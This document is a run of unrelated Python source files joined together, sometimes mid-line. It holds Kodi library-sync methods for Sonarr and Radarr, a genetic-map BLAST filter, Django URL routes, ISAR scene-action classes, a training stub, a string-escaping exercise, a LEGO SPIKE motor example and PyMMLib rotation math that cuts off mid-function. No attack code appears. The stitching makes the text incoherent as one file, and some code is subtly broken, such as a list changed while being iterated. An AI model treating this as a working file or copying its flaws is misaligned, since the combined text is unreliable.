episodeDetails: details = episodeDetails else: return None return {k:v for k, v in details.items() if k in ['playcount', 'lastplayed', 'episodeid', 'dateadded']} def _toggleEpisodeWatchedState(self, episodeID): # toggle watchedstate on each nonscanned host watchedState = self._getEpisodeWatchedState(episodeID) newWatchedState = self._modifyWatchedState(watchedState) for host in self.hosts: if not host.scanned: self._setEpisodeWatchedState(host, newWatchedState) self._setEpisodeWatchedState(host, watchedState) def _setEpisodeWatchedState(self, host, watchedState): if not watchedState: return None # Get what is currently in the library oldWatchedState = self._getEpisodeWatchedState(watchedState['episodeid']) # check if we need a watched state change if oldWatchedState == watchedState: return True self.log.debug('Setting episode watched state to {} Host: {}'.format(watchedState, host.name)) # Initiate the changes try: response = host.VideoLibrary.SetEpisodeDetails(watchedState) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Failed to set watched state watchedState: {} Error: {}'.format(watchedState, e)) response = None if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. Trying next host.'.format(host.name, response)) return False t = 0 while t < self.TIMEOUT * 10: time.sleep(0.1) t += 1 newWatchedState = self._getEpisodeWatchedState(watchedState['episodeid']) if newWatchedState and not newWatchedState == oldWatchedState: self.log.debug('Setting watched state complete. Took {}s'.format(t/10)) return True self.log.warning('Host: {} Timed out after {}s while setting episode watched state. Trying next host.'.format(host.name, t/10)) return False def _removeEpisode(self, episodeID): # Remove given episode and return true if success self.log.debug('Removing episodeID: {}'.format(episodeID)) params = { 'episodeid': episodeID } for host in self.hosts: try: response = host.VideoLibrary.RemoveEpisode(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: response = None if not response == 'OK': self.log.warning('Host: {} Failed to remove episodeid: {} Error: {}'.format(host.name, episodeID, e)) continue return True def _refreshEpisode(self, episodeID, episodePath): # store watched state for later # remove any episode that matches tvshowid, season, episode (may be more than one) # initiate a scan on tvshow folder # return new episodeID self.log.debug('Refreshing episodeID: {}'.format(episodeID)) # Retain details of given episodeid episodeDetails = self._getEpisodeDetails(episodeID) tvShowDetails = self._getTVShowDetails(episodeDetails['tvshowid']) watchedState = self._getEpisodeWatchedState(episodeDetails=episodeDetails) # Get all episodes matching tvshowid, season, episode episodeIDs = [episode['episodeid'] for episode in self._getEpisodes(episodeDetails['tvshowid']) if episode['season'] == episodeDetails['season'] and episode['episode'] == episodeDetails['episode']] # remove all found episodes for epID in episodeIDs: self._removeEpisode(epID) # Initiate scan of show directory newEpisodeID = self._scanTVShowDirectory(tvShowDetails['file'], episodePath) # Set previously collected watched state of new episode watchedState['episodeid'] = newEpisodeID for host in self.hosts: if self._setEpisodeWatchedState(host, watchedState): return newEpisodeID return None def _scanTVShowDirectory(self, showDirectory, episodePath): # Scan tvshow directory and return new episodeID self.log.debug('Scanning show directory {}'.format(showDirectory)) showID = self._getTVShowID(showDirectory) for host in self.hosts: if not self.update_while_playing and host.inUse: self.log.info('{} is currently playing a video. Skipping update.'.format(host.name)) continue try: response = host.VideoLibrary.Scan(directory=showDirectory) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse): pass if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. Trying next host.'.format(host.name, response)) continue t = 0 while t < self.TIMEOUT * 10: time.sleep(0.1) t += 1 episodeID = self._getEpisodeID(showID, episodePath) if episodeID: host.scanned = True self.log.debug('Scan complete. EpisodeID: {} Took {}s'.format(episodeID, t/10)) return episodeID self.log.warning('Host: {} Timed out after {}s while scanning show directory. Trying next host.'.format(host.name, t/10)) return None def _scanNewTVShow(self, showDirectory, episodePath): # Full library scan and return new episodeID self.log.debug('Scanning new Tv Show {}. This may take a while.'.format(showDirectory)) for host in self.hosts: if not self.update_while_playing and host.inUse: self.log.info('{} is currently playing a video. Skipping update.'.format(host.name)) continue try: response = host.VideoLibrary.Scan() # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse): pass if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. Trying next host.'.format(host.name, response)) continue t = 0 while t < self.TIMEOUT * 60: time.sleep(1) t += 1 episodeID = self._getEpisodeID(self._getTVShowID(showDirectory), episodePath) if episodeID: host.scanned = True self.log.debug('Scan complete. EpisodeID: {} Took {}s'.format(episodeID, t)) return episodeID self.log.warning('Host: {} Timed out after {}s while scanning entire library. Trying next host.'.format(host.name, t/10)) # Main method used to update / add new episode / tvshow def updateTVShow(self, episodePath, showDirectory): showID = self._getTVShowID(showDirectory) episodeID = self._getEpisodeID(showID, episodePath) # Refresh or add this episode to the library if episodeID: # Episode and show exists. Refresh episode. Return updated episodeID. episodeID = self._refreshEpisode(episodeID, episodePath) notificationStr = 'Updated Episode ' elif showID: # Show exists but not episode. Scaning show directory for new content. Return new episodeID. episodeID = self._scanTVShowDirectory(showDirectory, episodePath) notificationStr = 'Added Episode ' else: # Neither show nor episode exist. Preform full library scan. Return new episodeID. episodeID = self._scanNewTVShow(showDirectory, episodePath) notificationStr = 'Added TV Show ' # Toggle watched state of this new/updated episode self._toggleEpisodeWatchedState(episodeID) # Send notifications episodeDetails = self._getEpisodeDetails(episodeID) notificationStr += '"{}" S{}E{} "{}"'.format(episodeDetails['showtitle'], episodeDetails['season'], episodeDetails['episode'], episodeDetails['label']) for host in self.hosts: if host.show_notifications: self.log.info('Sending notification to {}. Message: "{}"'.format(host.name, notificationStr)) host.notify(notificationStr, 'Sonarr') ######################## Movie methods ####################### def _getMovieID(self, title, path): if not title or not path: return params = { 'filter': {'operator': 'is', 'field': 'title', 'value': title}, 'properties': ['file'] } for host in self.hosts: try: response = host.VideoLibrary.GetMovies(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get movieid for {}. Error: {}'.format(host.name, title, e)) response = None if response and 'movies' in response: # if more than one movie was found parse through and pick one based on path ignoring extension for movie in response['movies']: if os.path.splitext(movie['file'])[0] == os.path.splitext(path)[0]: return movie['movieid'] return None def _getMovieDetails(self, movieID): if not movieID: return None params = { 'movieid': int(movieID), 'properties': ['file', 'lastplayed', 'playcount', 'year', 'dateadded'] } for host in self.hosts: self.log.debug('Getting Movie details from host: {} for movieID: {}'.format(host.name, movieID)) try: response = host.VideoLibrary.getMovieDetails(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get Movie details movieID: {} Error: {}'.format(host.name, movieID, e)) response = None if response and 'moviedetails' in response: self.log.debug('moviedetails: {}'.format(response['moviedetails'])) return response['moviedetails'] return None def _getMovieIDs(self, title): if not title: return [] params = { 'properties': ['file', 'lastplayed', 'playcount', 'year'], 'filter': {'operator': 'is', 'field': 'title', 'value': title} } for host in self.hosts: try: response = host.VideoLibrary.GetMovies(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get Movie list matching {} Error: {}'.format(host.name, title, e)) return [] if response and 'movies' in response: return response['movies'] def _removeMovie(self, movieID): self.log.debug('Removing movieID: {}'.format(movieID)) params = { 'movieid': movieID } for host in self.hosts: try: response = host.VideoLibrary.RemoveMovie(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: response = None if not response == 'OK': self.log.warning('Host: {} Failed to remove movieID: {} Error: {}'.format(host.name, movieID, e)) continue return True def _refreshMovie(self, movieID, movieDirectory): # Save watched state of movie currently in library # Remove movie currently in library # Rescan that directory # Set watched state of new movie to previously recorded value # return the new movie id self.log.info('Refreshing movieID: {}'.format(movieID)) # Save watched state and movie details of movie currently in library movieDetails = self._getMovieDetails(movieID) watchedState = self._getMovieWatchedState(movieDetails=movieDetails) # Get all movies matching title and directory movieIDs = [movie['movieid'] for movie in self._getMovieIDs(movieDetails['label']) if movieDirectory in movie['file']] # Remove movie in the library (could be more than one instance of the same movie) for mID in movieIDs: self._removeMovie(mID) # Rescan directory newMovieID = self._scanNewMovie(movieDetails['label'], movieDirectory, movieDetails['file']) # Set watched state watchedState['movieid'] = newMovieID for host in self.hosts: if self._setMovieWatchedState(host, watchedState): return newMovieID return None def _scanNewMovie(self, title, movieDirectory, moviePath): self.log.debug('Initiating directory scan for new movie. directory: "{}"'.format(movieDirectory)) if not movieDirectory.endswith('/'): movieDirectory += '/' for host in self.hosts: if not self.update_while_playing and host.inUse: self.log.info('{} is currently playing a video. Skipping update.'.format(host.name)) continue try: response = host.VideoLibrary.Scan(directory=movieDirectory) except (ReceivedErrorResponse, ReceivedNoResponse): pass if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. Trying next host.'.format(host.name, response)) continue t = 0 while t < self.TIMEOUT * 10: time.sleep(0.1) t += 1 movieID = self._getMovieID(title, moviePath) if movieID: self.log.debug('Directroy Scan complete. New movieID: {} Took {}s'.format(movieID, t/10)) host.scanned = True return movieID self.log.warning('Host: {} Timed out after {}s while scanning new movie. Trying next host.'.format(host.name, t/10)) self.log.warning('All hosts failed to scan by directory. Initiating full library scan.') for host in self.hosts: if not self.update_while_playing and host.inUse: self.log.info('{} is currently playing a video. Skipping update.'.format(host.name)) continue try: response = host.VideoLibrary.Scan() except (ReceivedErrorResponse, ReceivedNoResponse): pass if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. Trying next host.'.format(host.name, response)) continue t = 0 while t < self.TIMEOUT * 60: time.sleep(1) t += 1 movieID = self._getMovieID(title, moviePath) if movieID: self.log.debug('Full scan complete. New movieID: {} Took {}s'.format(movieID, t)) host.scanned = True return movieID self.log.warning('Host: {} Timed out after {}s while scanning new movie. Trying next host.'.format(host.name, t)) self.log.warning('All hosts failed to scan "{}" {}. Aborting.'.format(title, moviePath)) def _getMovieWatchedState(self, movieID=None, movieDetails=None): if movieID: details = self._getMovieDetails(movieID) elif movieDetails: details = movieDetails else: return None return {k:v for k, v in details.items() if k in ['playcount', 'lastplayed', 'movieid', 'dateadded']} def _setMovieWatchedState(self, host, watchedState): if not watchedState: return None # Get what is currently in the library oldWatchedState = self._getMovieWatchedState(watchedState['movieid']) # Check if we need to set watched state if oldWatchedState == watchedState: return True self.log.debug('Setting movie watched state to {} Host: {}'.format(watchedState, host.name)) # Initiate the changes try: response = host.VideoLibrary.SetMovieDetails(watchedState) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Failed to set watched state watchedState: {} Error: {}'.format(watchedState, e)) if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}.'.format(host.name, response)) return t = 0 while t < self.TIMEOUT * 10: time.sleep(0.1) t += 1 newWatchedState = self._getMovieWatchedState(watchedState['movieid']) if newWatchedState and not oldWatchedState == newWatchedState: self.log.debug('Setting watched state complete. Took {}s'.format(t/10)) return self.log.warning('Host: {} Timed out after {}s while setting movie watched state.'.format(host.name, t/10)) def _toggleMovieWatchedState(self, movieID): for host in self.hosts: if not host.scanned: watchedState = self._getMovieWatchedState(movieID) newWatchedState = self._modifyWatchedState(watchedState) self.log.info('Toggling watched state on host: {}'.format(host.name)) self._setMovieWatchedState(host, newWatchedState) self._setMovieWatchedState(host, watchedState) # Main method used to update / add new movie def updateMovie(self, title, movieDirectory, moviePath): movieID = self._getMovieID(title, moviePath) if not movieID: movieID = self._scanNewMovie(title, movieDirectory, moviePath) notificationStr = 'Added New Movie ' else: movieID = self._refreshMovie(movieID, movieDirectory) notificationStr = 'Updated Movie ' # Toggle watched state on remaining hosts self._toggleMovieWatchedState(movieID) # Send notifications movieDetails = self._getMovieDetails(movieID) notificationStr += '"{}" ({})'.format(movieDetails['label'], movieDetails['year']) for host in self.hosts: if host.show_notifications: self.log.info('Sending notification to {}. Message: "{}"'.format(host.name, notificationStr)) host.notify(notificationStr, 'Radarr')krasileva-group/tgac-map #!/usr/bin/env python from __future__ import division import sys import csv from collections import Counter, defaultdict fn = sys.argv[1] with open(fn) as fi: # there are two .map-files in group-tg/reference/wheat-geneticbin-map/ gmap = {line.split('\t')[0]: tuple(line.strip().split('\t')[1:3]) for line in fi} cmap = Counter() dmap = defaultdict(Counter) fi = sys.stdin reader = csv.reader(fi, delimiter='\t') for row in reader: # print row if not row[0].startswith('#'): evalue = float(row[10]) if evalue > 1e-5: continue alen = float(row[3]) qlen = float(row[12]) if alen < 1000: #200 or alen / qlen < 0.75: continue pid = float(row[2]) if pid < 98.5: #85.0: continue cmap[tuple(row[:2])] += 1 dmap[row[0]][row[1]] += 1 # make sure to only use markers that align to one scaffold for k in dmap: if len(dmap[k]) == 1: cmap[(k, dmap[k].keys()[0])] = dmap[k].values()[0] for k in sorted(cmap): chr_, bin_ = gmap.get(k[0], (None, None)) if chr_ and bin_: print '\t'.join(map(str, [k[0], k[1], cmap[k], chr_, bin_])) from django.contrib import admin from django.contrib.auth.decorators import login_required from django.urls import path, include from rest_framework import routers from . import views from .views import UpdatePlanView app_name = "backend" router = routers.DefaultRouter() router.register(r'plans', views.PlanView, 'plan') urlpatterns = [ path('api/', include(router.urls)), path('create_plan/', login_required(views.CreatePlanView.as_view()), name='create_plan'), path('update/plan//', login_required(UpdatePlanView.as_view()), name='plan'), ]zardosht/isar import logging import time from threading import Thread from PyQt5.QtWidgets import QPushButton, QDialog, QLabel, QLineEdit from isar.scene import audioutil, sceneutil from isar.scene.scenemodel import Scene logger = logging.getLogger("isar.events.actions") class Action: # if an action has extra properties, it must set this to true, # and give an implementation for update_action_properties_frame(qt_frame) has_properties = False has_target = True has_single_target = False def __init__(self): self.name = "action" self.scene_id = None self.__target = None self.annotations_model = None self.scenes_model = None self._action_service = None @property def target(self): return self.__target @target.setter def target(self, target): # For debugging only: Added to catch this weired behavior that action target is the action itself! if isinstance(target, Action): raise RuntimeError() if not self.__class__.is_action_target_valid(target): logger.error("Action target is invalid: {}. Return.".format(target)) return self.__target = target def run(self): # must be implemented by subclasses pass @classmethod def is_action_target_valid(cls, action_target): if not cls.has_target: return True else: if action_target is None: logger.error("action_target is None. Return.") return False if cls.has_single_target: if type(action_target) not in cls.target_types: logger.error("Action target not matching target type of the action. Return.") return False else: if type(action_target) != list: logger.error("Action target not matching target type of the action. Return.") return False type_matches = False for target in action_target: type_matches = False for target_type in cls.target_types: if isinstance(target, target_type): type_matches = True break if not type_matches: logger.error("Action target not matching target type of the action. Return.") return False return True def __getstate__(self): state = self.__dict__.copy() del state["annotations_model"] del state["scenes_model"] del state["_action_service"] return state def __setstate__(self, state): self.__init__() self.__dict__.update(state) class ToggleAnnotationVisibilityAction(Action): """ Toggles the visibility of multiple annotations. """ from isar.scene.annotationmodel import Annotation target_types = [Annotation] def __init__(self): super().__init__() def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return for annotation in self.target: is_visible = annotation.show.get_value() annotation.show.set_value(not is_visible) class ShowAnnotationAction(ToggleAnnotationVisibilityAction): def __init__(self): super().__init__() def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return for annotation in self.target: annotation.show.set_value(True) class HideAnnotationAction(ToggleAnnotationVisibilityAction): def __init__(self): super().__init__() def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return for annotation in self.target: annotation.show.set_value(False) class ShowSceneAction(Action): """ Must have a scene as its target """ target_types = [Scene] has_single_target = True def __init__(self): super().__init__() def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == Scene: self.scenes_model.show_scene(self.target.name) else: logger.error("self.target is not a Scene.") class NextSceneAction(Action): """ Next scene in scene navigation sequence """ global_action_name = "Next Scene" has_target = False def __init__(self): super().__init__() def run(self): self.scenes_model.show_next_scene() class PreviousSceneAction(Action): """ Previous scene in scene navigation sequence """ global_action_name = "Previous Scene" has_target = False def __init__(self): super().__init__() def run(self): self.scenes_model.show_previous_scene() class BackSceneAction(Action): """ Back scene. This is added for the cases where user views a scene that is not part of the defined navigation flow. Imagine for example a navigation flow consists of [S1, S2, S3] for S2 we have a scene H1 that shows help, and is shown using an action button. On the help scene (H1), an action button calls the back action to return to S2. This is different from previous scene action, that refers to the previous scene in navigation flow, i.e. S1 """ global_action_name = "Back Scene" has_target = False def __init__(self): super().__init__() def run(self): self.scenes_model.show_back_scene() class StartTimerAction(Action): """ Must have a timer annotation as its target. """ from isar.scene.annotationmodel import TimerAnnotation target_types = [TimerAnnotation] has_single_target = True def __init__(self): super().__init__() def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == StartTimerAction.target_types[0]: self.target.start() else: logger.error("self.target is not TimerAnnotation.") class StopTimerAction(Action): """ Must have a timer annotation as its target. """ from isar.scene.annotationmodel import TimerAnnotation target_types = [TimerAnnotation] has_single_target = True def __init__(self): super().__init__() def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == StopTimerAction.target_types[0]: self.target.stop() else: logger.error("self.target is not TimerAnnotation.") class ResetTimerAction(Action): """ Must have a timer annotation as its target. """ from isar.scene.annotationmodel import TimerAnnotation target_types = [TimerAnnotation] has_single_target = True def __init__(self): super().__init__() self.timer_name = None def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == ResetTimerAction.target_types[0]: self.target.reset() else: logger.error("self.target is not TimerAnnotation.") class StartAudioAction(Action): """ Must have a sound annotation as its target. """ from isar.scene.annotationmodel import AudioAnnotation target_types = [AudioAnnotation] has_single_target = True def __init__(self): super().__init__() self.annotation_name = None def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == StartAudioAction.target_types[0]: annotation = self.target audio_file_path = annotation.audio_path.get_value() loop = annotation.loop_playback.get_value() audioutil.play(audio_file_path, loop) else: logger.error("self.target is not AudioAnnotation.") class StopAudioAction(Action): """ Must have a sound annotation as its target. """ from isar.scene.annotationmodel import AudioAnnotation target_types = [AudioAnnotation] has_single_target = True def __init__(self): super().__init__() self.annotation_name = None def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == StopAudioAction.target_types[0]: annotation = self.target audio_file_path = annotation.audio_path.get_value() audioutil.stop(audio_file_path) else: logger.error("self.target is not AudioAnnotation.") class StartVideoAction(Action): """ Must have a video annotation as its target. """ from isar.scene.annotationmodel import VideoAnnotation target_types = [VideoAnnotation] has_single_target = True def __init__(self): super().__init__() def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == StartVideoAction.target_types[0]: self.target.start() else: logger.error("self.target is not VideoAnnotation") class StopVideoAction(Action): """ Must have a video annotation as its target. """ from isar.scene.annotationmodel import VideoAnnotation target_types = [VideoAnnotation] has_single_target = True def __init__(self): super().__init__() def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == StopVideoAction.target_types[0]: self.target.stop() else: logger.error("self.target is not VideoAnnotation") class StartAnimationAction(Action): from isar.scene.annotationmodel import AnimationAnnotation target_types = [AnimationAnnotation] def __init__(self): super().__init__() self.animation_names = None self.exercise = None def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return if self.exercise is None: for animation in self.target: animation.start() elif not self.exercise.running: self.exercise.start() class StopAnimationAction(Action): from isar.scene.annotationmodel import AnimationAnnotation target_types = [AnimationAnnotation] def __init__(self): super().__init__() self.animation_names = None self.exercise = None def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return if self.exercise is None: for animation in self.target: animation.stop() elif self.exercise.running: self.exercise.stop() class HighlightPhysicalObjectsAction(Action): from isar.scene.physicalobjectmodel import PhysicalObject target_types = [PhysicalObject] has_properties = True color = "0, 255, 0" def __init__(self): super().__init__() def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return for phys_obj in self.target: phys_obj.highlight = True phys_obj.highlight_color = self.color @classmethod def update_action_properties_frame(cls, scene, select_target_dialog, qt_frame): layout = qt_frame.layout() for i in reversed(range(layout.count())): widget_to_remove = layout.itemAt(i).widget() layout.removeWidget(widget_to_remove) widget_to_remove.setParent(None) label = QLabel() label.setText("Color: ") layout.addWidget(label) line_edit = QLineEdit() line_edit.setText(str(HighlightPhysicalObjectsAction.color)) layout.addWidget(line_edit) set_color_btn = QPushButton() set_color_btn.setText("Set Color") layout.addWidget(set_color_btn) set_color_btn.clicked.connect(lambda: HighlightPhysicalObjectsAction.set_color(line_edit)) @classmethod def set_color(cls, line_edit): value = line_edit.text() color, success = sceneutil.get_color_from_str(value) if color and success: HighlightPhysicalObjectsAction.color = color @classmethod def reset_properties(cls): HighlightPhysicalObjectsAction.color = "0, 255, 0" @classmethod def set_properties(cls, instance): instance.color = HighlightPhysicalObjectsAction.color class UnHighlightPhysicalObjectsAction(Action): from isar.scene.physicalobjectmodel import PhysicalObject target_types = [PhysicalObject] def __init__(self): super().__init__() def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return for phys_obj in self.target: phys_obj.highlight = False phys_obj.highlight_color = None class CompositeAction(Action): actions = [] def __init__(self): super().__init__() @classmethod def update_action_properties_frame(cls, scene, select_target_dialog, qt_frame): layout = qt_frame.layout() for i in reversed(range(layout.count())): widget_to_remove = layout.itemAt(i).widget() layout.removeWidget(widget_to_remove) widget_to_remove.setParent(None) select_actions_btn = QPushButton() select_actions_btn.setText("Select Actions ...") layout.addWidget(select_actions_btn) actions_label = QLabel() actions_label.setWordWrap(True) layout.addWidget(actions_label) select_actions_btn.clicked.connect(lambda: CompositeAction.show_select_target_dialog( scene, select_target_dialog, actions_label)) @classmethod def show_select_target_dialog(cls, scene, select_target_dialog, actions_label): CompositeAction.actions = None select_target_dialog.scene = scene select_target_dialog.set_target_types(Action) select_target_dialog.setModal(True) select_target_dialog.exec() if select_target_dialog.result() == QDialog.Accepted: CompositeAction.actions = select_target_dialog.get_targets() text = "" for action in CompositeAction.actions: text += action.name + "\n" actions_label.setText(text) class ParallelCompositeAction(Action): has_target = False has_properties = True def __init__(self): super().__init__() self.actions = [] def run(self): for action in self.actions: t = Thread(name="ParallelCompositeActionThread", target=lambda a: self._action_service.perform_action(a), args=(action, )) t.start() @classmethod def update_action_properties_frame(cls, scene, select_target_dialog, qt_frame): CompositeAction.update_action_properties_frame(scene, select_target_dialog, qt_frame) @classmethod def reset_properties(cls): CompositeAction.actions = [] @classmethod def set_properties(cls, instance): instance.actions = CompositeAction.actions class SequentialCompositeAction(Action): has_target = False has_properties = True def __init__(self): super().__init__() self.actions = [] self.time_between_actions = 1 def run(self): t = Thread(name="SequentialCompositeActionThread", target=self.do_run) t.start() def do_run(self): for action in self.actions: self._action_service.perform_action(action) time.sleep(self.time_between_actions) @classmethod def update_action_properties_frame(cls, scene, select_target_dialog, qt_frame): CompositeAction.update_action_properties_frame(scene, select_target_dialog, qt_frame) @classmethod def reset_properties(cls): CompositeAction.actions = [] @classmethod def set_properties(cls, instance): instance.actions = CompositeAction.actions scene_action_types = { ToggleAnnotationVisibilityAction.__name__: ToggleAnnotationVisibilityAction, ShowAnnotationAction.__name__: ShowAnnotationAction, HideAnnotationAction.__name__: HideAnnotationAction, ShowSceneAction.__name__: ShowSceneAction, StartTimerAction.__name__: StartTimerAction, StopTimerAction.__name__: StopTimerAction, ResetTimerAction.__name__: ResetTimerAction, StartAudioAction.__name__: StartAudioAction, StopAudioAction.__name__: StopAudioAction, StartVideoAction.__name__: StartVideoAction, StopVideoAction.__name__: StopVideoAction, StartAnimationAction.__name__: StartAnimationAction, StopAnimationAction.__name__: StopAnimationAction, HighlightPhysicalObjectsAction.__name__: HighlightPhysicalObjectsAction, UnHighlightPhysicalObjectsAction.__name__: UnHighlightPhysicalObjectsAction, ParallelCompositeAction.__name__: ParallelCompositeAction, SequentialCompositeAction.__name__: SequentialCompositeAction } global_action_types = { NextSceneAction.__name__: NextSceneAction, PreviousSceneAction.__name__: PreviousSceneAction, BackSceneAction.__name__: BackSceneAction } # Copyright (c) Microsoft. All rights reserved. # Licensed under the MIT license. print("In train.py") print("As a data scientist, this is where I use my training code.") class Solution: # @param {char[]} string: An array of Char # @param {int} length: The true length of the string # @return {int} The true length of new string def replaceBlank(self, string, length): # Write your code here if string is None: return 0 for i, c in enumerate(string): if c == ' ': string.pop(i) string.insert(i, '0') string.insert(i, '2') string.insert(i, '%') return len(''.join(string)) '''start(steering=0, speed=None) Start both motors simultaneously to move a Driving Base. Steering = "0" makes the Driving Base go straight. Negative numbers make the Driving Base turn left. Positive numbers make the Driving Base turn right. The program flow is not interrupted. This is most likely interrupted by sensor input and a condition. If the value of steering is equal to "-100" or "100," the Driving Base will perform a rotation on itself (i.e., "tank move") at the default speed of each motor. If the value of "steering" is outside of the allowed range, the value will be set to "-100" or "100," depending on whether the value is positive or negative. If speed is outside of the allowed range, the value will be set to "-100" or "100," depending on whether the value is positive or negative. If the speed is negative, the Driving Base will move backward instead of forward. Likewise, if the "amount" is negative, the Driving Base will move backward instead of forward. If both the speed and the "amount" are negative, the Driving Base will move forward. Parameters steering The direction and quantity to steer the Driving Base. Type:integer (a positive or negative whole number, including 0) Values:-100 to 100 Default:0 speed The speed at which the Driving Base will move while performing a curve. Type:integer (a positive or negative whole number, including 0) Values:-100 to 100% Default:If no value is specified, it will use the default speed that’s been set by set_default_speed(). Errors TypeError steering or speed is not an integer. RuntimeError One or both of the motors has been disconnected or the motors could not be paired. Example ''' from spike import MotorPair import time motor_pair = MotorPair('B', 'A') motor_pair.start() time.sleep_ms(2000) # wait for something motor_pair.stop() ## Copyright 2002-2010 by PyMMLib Development Group (see AUTHORS file) ## This code is part of the PyMMLib distribution and governed by ## its license. Please see the LICENSE file that should have been ## included as part of this package. """Mathematical operations performed on mmLib.Strcuture.Atom objects. """ import math import numpy import Constants ## ## Linear Algebra ## def length(u): """Calculates the length of u. """ return math.sqrt(numpy.dot(u, u)) def normalize(u): """Returns the normalized vector along u. """ return u/math.sqrt(numpy.dot(u, u)) def cross(u, v): """Cross product of u and v: Cross[u,v] = {-u3 v2 + u2 v3, u3 v1 - u1 v3, -u2 v1 + u1 v2} """ return numpy.array([ u[1]*v[2] - u[2]*v[1], u[2]*v[0] - u[0]*v[2], u[0]*v[1] - u[1]*v[0] ], float) ## ## Internal Linear Algebra (without using numpy) ## def internal_cross(u, v): """Returns the cross product of two vectors. Should be identical to the output of numpy.cross(u, v). """ return(u[1]*v[2] - v[1]*u[2], u[2]*v[0] - v[2]*u[0], u[0]*v[1] - v[0]*u[1]) def internal_dot(u, v): """Returns the dot product of two vectors. Should be identical to the output of numpy.dot(u, v). """ return u[0]*v[0] + u[1]*v[1] + u[2]*v[2] def internal_inv3x3(u): """Returns the inverse of a 3x3 matrix. Should be identical to the output of numpy.linalg.inv(u). """ inv = [[0,0,0],[0,0,0],[0,0,0]] c = [] c.append(internal_cross(u[1], u[2])) ## c[0] c.append(internal_cross(u[2], u[0])) ## c[1] c.append(internal_cross(u[0], u[1])) ## c[2] d = internal_dot(u[0], c[0]) if(abs(d) < 1e-30): return 0.0, inv for i in range(0,3): for j in range(0,3): inv[i][j] = float(c[j][i]) / float(d) return d, inv ## ## Rotation/Displacement ## def rmatrix(alpha, beta, gamma): """Return a rotation matrix based on the Euler angles alpha, beta, and gamma in radians. """ cosA = math.cos(alpha) cosB = math.cos(beta) cosG = math.cos(gamma) sinA = math.sin(alpha) sinB = math.sin(beta) sinG = math.sin(gamma) R = numpy.array( [[cosB*cosG, cosG*sinA*sinB-cosA*sinG, cosA*cosG*sinB+sinA*sinG], [cosB*sinG, cosA*cosG+sinA*sinB*sinG, cosA*sinB*sinG-cosG*sinA ], [-sinB, cosB*sinA, cosA*cosB ]], float) assert numpy.allclose(numpy.linalg.det(R), 1.0) return R def rmatrixu(u, theta): """Return a rotation matrix caused by a right hand rotation of theta radians around vector u. """ if numpy.allclose(theta, 0.0) or numpy.allclose(numpy.dot(u,u), 0.0): return numpy.identity(3, float) x, y, z = normalize(u) sa = math.sin(theta) ca = math.cos(theta) R = numpy.array( [[1.0+(1.0-ca)*(x*x-1.0), -z*sa+(1.0-ca)*x*y, y*sa+(1.0-ca)*x*z], [z*sa+(1.0-ca)*x*y, 1.0+(1.0-ca)*(y*y-1.0), -x*sa+(1.0-ca)*y*z], [-y*sa+(1.0-ca)*x*z, x*sa+(1.0-ca)*y*z, 1.0+(1.0-ca)*(z*z-1.0)]], float) try: assert numpy.allclose(numpy.linalg.det(R), 1.0) except AssertionError: print "rmatrixu(%s, %f) determinant(R)=%f" % ( u, theta, numpy.linalg.det(R)) raise return R def dmatrix(alpha, beta, gamma): """Returns the displacement matrix based on rotation about Euler angles alpha, beta, and gamma. """ return rmatrix(alpha, beta, gamma) - numpy.identity(3, float) def dmatrixu(u, theta): """Return a displacement matrix caused by a right hand rotation of theta radians around vector u. """ return rmatrixu(u, theta) - numpy.identity(3, float) def rmatrixz(vec): """Return a rotation matrix which transforms the coordinate system such that the vector vec is aligned along the z axis. """ u, v, w = normalize(vec) d = math.sqrt(u*u + v*v) if d != 0.0: Rxz = numpy.array([ [ u/d, v/d, 0.0 ], [ -v/d, u/d, 0.0 ], [ 0.0, 0.0, 1.0 ] ], float) else: Rxz = numpy.identity(3, float) Rxz2z = numpy.array([ [ w, 0.0, -d], [ 0.0, 1.0, 0.0], [ d, 0.0, w] ], float) R = numpy.dot(Rxz2z, Rxz) try: assert numpy.allclose(numpy.linalg.det(R), 1.0) except AssertionError: print "rmatrixz(%s) determinant(R)=%f" % (vec, numpy.linalg.det(R)) raise return R ## ## Quaternions ## def rquaternionu(u, theta): """Returns a quaternion representing the right handed rotation of theta radians about vector u. Quaternions are typed as Numeric Python numpy.arrays of length 4. """ u = normalize(u) half_sin_theta = math.sin(theta / 2.0) x = u[0] * half_sin_theta y = u[1] * half_sin_theta z = u[2] * half_sin_theta w = math.cos(theta / 